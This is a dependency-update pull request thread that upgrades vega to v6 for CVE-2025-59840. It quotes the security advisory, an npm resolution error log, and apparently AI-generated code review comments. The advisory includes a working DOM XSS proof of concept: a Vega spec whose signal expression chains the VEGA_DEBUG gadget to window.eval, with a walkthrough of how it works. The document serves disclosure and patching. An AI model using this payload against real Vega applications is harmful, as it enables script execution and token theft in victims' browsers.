fix(deps): update dependency vega to v6 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vega	^5.33.0 -> ^6.0.0

GitHub Vulnerability Alerts

CVE-2025-59840

Impact

Applications meeting 2 conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used.

1. Use vega in an application that attaches vega library and a vega.View instance similar to the Vega Editor to the global window
2. Allow user-defined Vega JSON definitions (vs JSON that was is only provided through source code)

Patches

• If using latest Vega line (6.x)
  • vega 6.2.0 / vega-expression 6.1.0 / vega-interpreter 2.2.1 (if using AST evaluator mode)
• If using Vega in a non-ESM environment
  • ( vega-expression 5.2.1 / 1.2.1 (if using AST evaluator mode)

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading

• Do not attach vega View instances to global variables, as Vega editor used to do here
• Do not attach vega to the global window as the editor used to do here

These practices of attaching the vega library and View instances may be convenient for debugging, but should not be used in production or in any situation where vega/vega-lite definitions could be provided by untrusted parties.

POC Summary

Vega offers the evaluation of expressions in a secure context. Arbitrary function call is prohibited. When an event is exposed to an expression, member get of window objects is possible. Because of this exposure, in some applications, a crafted object that overrides its toString method with a function that results in calling this.foo(this.bar), DOM XSS can be achieved.

In practice, an accessible gadget like this exists in the global VEGA_DEBUG code.

({
    toString: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, 
    eventName: event.view.console.log,
    _handlers: {
        undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
    },
    _handlerIndex: event.view.eval
})+1

POC Details

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": true,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "({toString:event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, eventName:event.view.console.log,_handlers:{undefined:'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'},_handlerIndex:event.view.eval})+1"
        }

      ]
    }
  ]
}

This payload creates a scenario where whenever the mouse is moved, the toString function of the provided object is implicitly called when trying to resolve adding it with 1. The toString function has been overridden to a "gadget function" (VEGA_DEBUG.vega.CanvasHandler.prototype.on) that does the following:

   on(a, o) {
        const u = this.eventName(a)
          , d = this._handlers;
        if (this._handlerIndex(d[u], a, o) < 0) {
        ....
        }
        ....
   }

1. Set u to the result of calling this.eventName with undefined
   • For our object, we have the eventName value set to console.log, which just logs undefined and returns undefined
2. Sets d to this._handlers
   • For our object, we have this defined to be used later
3. Calls this._handlerIndex with the result of u indexed into the d object as the first argument, and undefined as the second two.
   • For our object, _handlerIndex is set to window.eval, and when indexing undefined into the _handlers, a string to be evald containing the XSS payload is returned.

This results in XSS by using a globally scoped gadget to get full blown eval.

PoC Link

Navigate to vega editor, move the mouse, and observe that the arbitrary JavaScript from the configuration reaches the eval sink and DOM XSS is achieved.

Future investigation

In cases where VEGA_DEBUG is not enabled, there theoreticallycould be other gadgets on the global scope that allow for similar behavior. In cases where AST evaluator is used and there are blocks against getting references to eval, in theory there could be other gadgets on global scope (i.e. jQuery) that would allow for eval the same way (i.e. $.globalEval). As of this writing, no such globally scoped gadgets have been found.

Impact

This vulnerability allows for DOM XSS, potentially stored, potentially reflected, depending on how the library is being used. The vulnerability requires user interaction with the page to trigger.

An attacker can exploit this issue by tricking a user into opening a malicious Vega specification. Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the application’s domain. This can lead to theft of sensitive information such as authentication tokens, manipulation of data displayed to the user, or execution of unauthorized actions on behalf of the victim. This exploit compromises confidentiality and integrity of impacted applications.

---

Release Notes

vega/vega (vega)

v6.2.0

Compare Source

v6.1.2

Compare Source

v6.1.1

Compare Source

v6.1.0

Compare Source

v6.0.0

Compare Source

changes since v5.33.0

monorepo

• Vega is now ESM only! (via #​4018) (Thanks @​domoritz!)
• (fix) Correct browser export syntax (via #​4039) (Thanks @​domoritz!)
• (fix) Fix source maps (via #​4041) (Thanks @​domoritz!)
• (fix) handle string datetime in interpreter (via #​4042) (Thanks @​domoritz!)

vega-typings

• Expose resetSVGDefIds (via #​4012) (Thanks @​domoritz!)

docs

• Update deps and datasets (via #​4036) (Thanks @​domoritz!)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: package-lock.json

npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR! 
npm ERR! While resolving: vega-embed@6.29.0
npm ERR! Found: vega@6.2.0
npm ERR! node_modules/vega
npm ERR!   vega@"^6.0.0" from the root project
npm ERR!   peer vega@"*" from react-vega@7.7.1
npm ERR!   node_modules/react-vega
npm ERR!     react-vega@"^7.7.1" from the root project
npm ERR!   1 more (vega-themes)
npm ERR! 
npm ERR! Could not resolve dependency:
npm ERR! peer vega@"^5.21.0" from vega-embed@6.29.0
npm ERR! node_modules/vega-embed
npm ERR!   vega-embed@"^6.25.0" from the root project
npm ERR! 
npm ERR! Conflicting peer dependency: vega@5.33.0
npm ERR! node_modules/vega
npm ERR!   peer vega@"^5.21.0" from vega-embed@6.29.0
npm ERR!   node_modules/vega-embed
npm ERR!     vega-embed@"^6.25.0" from the root project
npm ERR! 
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.
npm ERR! 
npm ERR! See /runner/cache/others/npm/eresolve-report.txt for a full report.

npm ERR! A complete log of this run can be found in:
npm ERR!     /runner/cache/others/npm/_logs/2025-11-19T23_42_47_824Z-debug-0.log

[coderabbitai]

📝 Walkthrough

Walkthrough

The vega dependency in package.json was updated from ^5.33.0 to ^6.0.0. No source files, exported/public API signatures, or runtime control flow were changed in this commit. Review Vega v6 release notes for potential breaking changes or required integration updates.

Pre-merge checks

✅ Passed checks (3 passed)

Check name	Status	Explanation
Title check	✅ Passed	The title accurately describes the main change: a dependency update to Vega v6 to address a security vulnerability (CVE-2025-59840).
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.

Warning

Review ran into problems

🔥 Problems

Errors were encountered while retrieving linked issues.

Errors (1)

• CVE-2025: Entity not found: Issue - Could not find referenced Issue.

---

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[codecov]

⚠️ JUnit XML file not found

The CLI was unable to find any JUnit XML files to upload.
For more help, visit our troubleshooting guide.

[coderabbitai]

Actionable comments posted: 2

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)

package.json (1)

2527-2527: Update mime type declaration to match Vega v6.

VegaRenderer.tsx correctly uses Vega v6 APIs (vega.expressionFunction(), vega.scheme()) and react-vega 7.7.1 supports Vega v6. However, line 2209-2215 in package.json declares the renderer mime type as "application/vnd.vega.v5+json" while the codebase depends on vega ^6.0.0. Update the mime type to "application/vnd.vega.v6+json" to reflect the actual version in use.

📜 Review details

Configuration used: CodeRabbit UI

Review profile: ASSERTIVE

Plan: Pro

Disabled knowledge base sources:

• Linear integration is disabled by default for public repositories

You can enable these sources in your CodeRabbit configuration.

📥 Commits

Reviewing files that changed from the base of the PR and between 26ad568 and 64851ad.

📒 Files selected for processing (1)

• package.json (1 hunks)

🧰 Additional context used

🪛 GitHub Actions: CI

package.json

[error] 1-1: npm ci can only install packages when your package.json and lock file are in sync. Please update the lock file with 'npm install' before continuing.

🔇 Additional comments (1)

package.json (1)

2209-2213: Verify MIME type compatibility with Vega v6.

The vega renderer (line 2209–2213) is registered for the v5 MIME type (application/vnd.vega.v5+json). Confirm whether v6 uses the same MIME type for backward compatibility or if this registration should be updated to application/vnd.vega.v6+json.

[coderabbitai]

Actionable comments posted: 2

♻️ Duplicate comments (1)

package.json (1)

1-1: Lock file out of sync—CI blocker remains unresolved.

The pipeline is failing on npm ci due to ERESOLVE conflicts between package.json and the lock file. You must run npm install locally and commit the updated lock file (package-lock.json or yarn.lock) for CI to pass.

📜 Review details

Configuration used: CodeRabbit UI

Review profile: ASSERTIVE

Plan: Pro

Disabled knowledge base sources:

• Linear integration is disabled by default for public repositories

You can enable these sources in your CodeRabbit configuration.

📥 Commits

Reviewing files that changed from the base of the PR and between 64851ad and e7883ba.

📒 Files selected for processing (1)

• package.json (1 hunks)

🧰 Additional context used

🪛 GitHub Actions: CI

package.json

[error] 1-1: Command failed: npm ci --prefer-offline --no-audit. Dependency resolution errors and ERESOLVE overrides encountered during npm ci (peer dependency conflicts). Ensure package.json and package-lock.json are in sync by running 'npm install' to refresh the lockfile.

[coderabbitai]

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Verify ESM-only compatibility with bundler and webview runtime.

Vega v6 is ESM-only (breaking change). Your webview bundle, runtime, and build tooling must support ESM. Inspect:

• Build config (esbuild, webpack, rollup in build/esbuild/build.ts, webpack.config.js, etc.)
• Webview entrypoints (e.g., src/webviews/webview-side/vegaRenderer/vegaRenderer.js)
• Package.json module type and target ES versions

If your runtime or bundler does not support ESM, follow the security advisory's guidance for non-ESM environments.

---

---

🏁 Script executed:

#!/bin/bash
# Locate build configuration files
fd -e ts -e js -e json --path "*/build/*" -o --path "*/webpack*" -o --path "*/esbuild*" --maxdepth 3 | head -20

Length of output: 233

---

🏁 Script executed:

#!/bin/bash
# Check package.json module type and exports
cat package.json | grep -A5 -B5 '"type"'

Length of output: 25316

---

🏁 Script executed:

#!/bin/bash
# Find webview entrypoints
fd "vegaRenderer" -e js -e ts

Length of output: 0

---

🏁 Script executed:

#!/bin/bash
# Check if build config files exist and inspect them
ls -la build/esbuild/build.ts webpack.config.js 2>/dev/null || echo "Files not found at expected paths"

Length of output: 106

---

🌐 Web query:

Vega v6 ESM-only breaking change compatibility

💡 Result:

Short answer: Vega v6 is ESM-only (since v6.0.0), so code that expects a CommonJS/require() build will break. Use one of these options:

• Convert your project to ESM (use import, set "type": "module" or use .mjs files) and import from 'vega'. [1]
• From CommonJS, load Vega with dynamic import(): await import('vega') (or use an async wrapper). Node supports importing ESM from CJS only via import(). [2]
• Use a bundler (Webpack/Rollup/Vite) that understands ESM and will bundle Vega for your environment.
• Pin to the last v5 release if you cannot move to ESM. [1]

References: Vega v6 release notes (ESM-only). [1] Node ESM interoperability / dynamic import docs. [2]

Sources:
[1] Vega v6.0.0 release notes.
[2] Node.js ECMAScript Modules documentation (import() interoperability).

---

---

🏁 Script executed:

```shell
#!/bin/bash
# Inspect build configuration file
head -100 build/esbuild/build.ts | tail -80

Length of output: 2675

---

🏁 Script executed:

#!/bin/bash
# Check for webview files more broadly
find . -name "*webview*" -type f | grep -E "\.(js|ts)$" | head -20

Length of output: 255

---

🏁 Script executed:

#!/bin/bash
# Extract package.json root level structure (first 50 lines)
head -50 package.json

Length of output: 1235

---

🏁 Script executed:

#!/bin/bash
# Search for vega usage in the codebase
rg -n "import.*vega|require.*vega|from\s+['\"]vega" --type ts --type js | head -20

Length of output: 641

---

🏁 Script executed:

#!/bin/bash
# Search for module/exports configuration in package.json
rg -n "\"main\"|\"module\"|\"exports\"|\"type\"" package.json | head -15

Length of output: 662

---

---

🏁 Script executed:

```shell
#!/bin/bash
# Check if vega is in externals or bundled
rg -n "vega|externals" build/esbuild/build.ts | grep -E "(vega|External)" | head -20

Length of output: 222

---

🏁 Script executed:

#!/bin/bash
# Check esbuild target and platform settings
rg -n "target|platform|format" build/esbuild/build.ts | head -15

Length of output: 1033

---

🏁 Script executed:

#!/bin/bash
# Check for vega in webview build config
rg -A5 -B5 "webview.*bundle\|webview.*config" build/esbuild/build.ts | head -40

Length of output: 0

---

🏁 Script executed:

#!/bin/bash
# Check the deepnoteDataConverter imports more carefully
cat src/notebooks/deepnote/deepnoteDataConverter.ts | head -40

Length of output: 2022

---

---

🏁 Script executed:

```shell
#!/bin/bash
# Check if vega-lite is in externals or bundled in build config
rg -B20 "commonExternals|webExternals|deskTopNodeModulesToExternalize" build/esbuild/build.ts | grep -E "vega|const.*Externals|ToExternalize"

Length of output: 343

---

🏁 Script executed:

#!/bin/bash
# Get the full externals configuration
rg -A30 "const deskTopNodeModulesToExternalize" build/esbuild/build.ts

Length of output: 1114

---

🏁 Script executed:

#!/bin/bash
# Check how vega-renderer is actually built
rg -A20 "vega-renderer.*index.ts" build/esbuild/build.ts

Length of output: 982

---

Vega v6 ESM-only concern applies specifically to extension code, not webview.

Vega v6 is ESM-only, and verification reveals this affects your extension runtime:

• Webview (safe): src/webviews/webview-side/vega-renderer/ builds with target: 'web' → ESM output in browser environment. No issue.

• Extension (at risk): src/notebooks/deepnote/deepnoteDataConverter.ts imports vega-lite but esbuild bundles it with format: 'cjs' and target: 'node18'. ESM-only vega-lite bundled for CommonJS Node.js may fail at runtime.

Action needed: Verify esbuild can transpile ESM vega-lite to CJS or add vega/vega-lite to externals with runtime fallback. Check that Node.js 18+ in your extension host supports the bundled output format.

🤖 Prompt for AI Agents

In package.json around line 2544, the dependency entry for "vega": "^6.0.0"
introduces an ESM-only package that can break the extension runtime where
vega/vega-lite is bundled as CJS; update the build config for
src/notebooks/deepnote/deepnoteDataConverter.ts so esbuild either (A) transpiles
ESM vega/vega-lite to CJS correctly by enabling esbuild's esModuleInterop/format
settings and ensuring target/node settings align with Node 18+, or (B) marks
vega and vega-lite as externals and implement a runtime fallback that
dynamically imports the ESM package in the extension host (or uses a
CJS-compatible wrapper). Also validate the extension host Node version supports
the chosen output format and add a test run to confirm no runtime errors.

---

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Pin Vega to v6.2.0; version constraint allows unpatched releases.

CVE-2025-59840 is patched in Vega 6.2.0 and later. The constraint ^6.0.0 permits 6.0.x–6.1.x (unpatched). Change to ^6.2.0 (or >=6.2.0) to ensure the security fix is applied.

Additionally, per the security advisory, update related transitive/peer dependencies:

• vega-expression → ^6.1.0 (or ^5.2.1 for non-ESM consumers)
• vega-interpreter → ^2.2.1

Verify these are already satisfied or add them to dependencies as needed.

---

🏁 Script executed:

#!/bin/bash
# Extract vega-related dependencies from package.json
jq '.dependencies | with_entries(select(.key | contains("vega")))' package.json 2>/dev/null || echo "Could not read package.json"

Length of output: 101

---

🌐 Web query:

CVE-2025-59840 Vega security vulnerability

💡 Result:

Summary — CVE-2025-59840

• What it is: a high‑severity DOM XSS / arbitrary JavaScript execution in Vega (visualization grammar) when an app both (a) attaches the vega library and a vega.View instance to the global window and (b) accepts user‑supplied Vega JSON definitions. It can be triggered even when the “safe mode” expression interpreter is used. Published Nov 13, 2025. [1][2][3]

• Affected versions: vega < 6.2.0; certain vega-expression and vega-interpreter version ranges noted in advisories. [1][2]

• Impact: attacker-supplied Vega specs can execute arbitrary JavaScript in victims’ browsers (DOM XSS) under the conditions above; severe (CVSSv3 ~8.x). [1][2]

Remediation / mitigation

1. Upgrade: vega → 6.2.0 or later. Also upgrade vega-expression / vega-interpreter per the advisories (e.g., vega-expression 6.1.0 / 5.2.1, vega-interpreter 2.2.1 or later where applicable). [1][2]
2. Workarounds if you cannot upgrade immediately:
   • Do NOT attach the vega library or vega.View instances to global variables (e.g., window). Avoid exposing them for debugging in production.
   • Disable or restrict user-supplied Vega/Vega‑Lite JSON input or sanitize/validate all user-provided specs; limit Vega usage to trusted sources. [2][3]

References

• NVD / CVE entry for CVE-2025-59840. [1]
• Snyk vulnerability summary and recommended upgrade/workaround. [2]
• Elastic / public advisories reporting the issue and affected products (Kibana examples). [3]

---

🏁 Script executed:

#!/bin/bash
# Check if package-lock.json exists and search for vega-expression/vega-interpreter
if [ -f package-lock.json ]; then
  echo "=== Checking package-lock.json for vega-expression and vega-interpreter ==="
  jq '.packages | with_entries(select(.key | contains("vega-expression") or contains("vega-interpreter"))) | keys' package-lock.json 2>/dev/null || echo "Not in lock format"
else
  echo "No package-lock.json found"
fi

# Also check if they're peer/optional deps listed in package.json
echo ""
echo "=== Checking peerDependencies and optionalDependencies ==="
jq '.peerDependencies // empty, .optionalDependencies // empty' package.json 2>/dev/null | grep -i vega || echo "No vega-related peer/optional deps"

Length of output: 299

---

🏁 Script executed:

#!/bin/bash
# Extract current versions of vega-expression and vega-interpreter from lock
echo "=== Current resolved versions in lock file ==="
jq '.packages | with_entries(select(.key | test("node_modules/vega-(expression|interpreter)$"))) | map({key, version: .value.version})' package-lock.json 2>/dev/null

echo ""
echo "=== Check vega v6.2.0+ availability and its declared dependencies ==="
# Try to find what vega 6.2.0 lists as dependencies
npm view vega@6.2.0 dependencies 2>/dev/null || echo "Could not fetch npm registry data"

Length of output: 897

---

Upgrade vega to ^6.2.0 and verify transitive dependencies.

CVE-2025-59840 is a high-severity DOM XSS in Vega versions before 6.2.0. Your current constraint ^6.0.0 permits vulnerable 6.0.x–6.1.x releases. Change to ^6.2.0.

Vega 6.2.0 declares vega-expression ~6.1.0 as a dependency, which satisfies the advisory. Verify vega-interpreter also resolves to 2.2.1+ per the advisory recommendations.

package.json, line 2544:

• Change "vega": "^6.0.0" → "vega": "^6.2.0"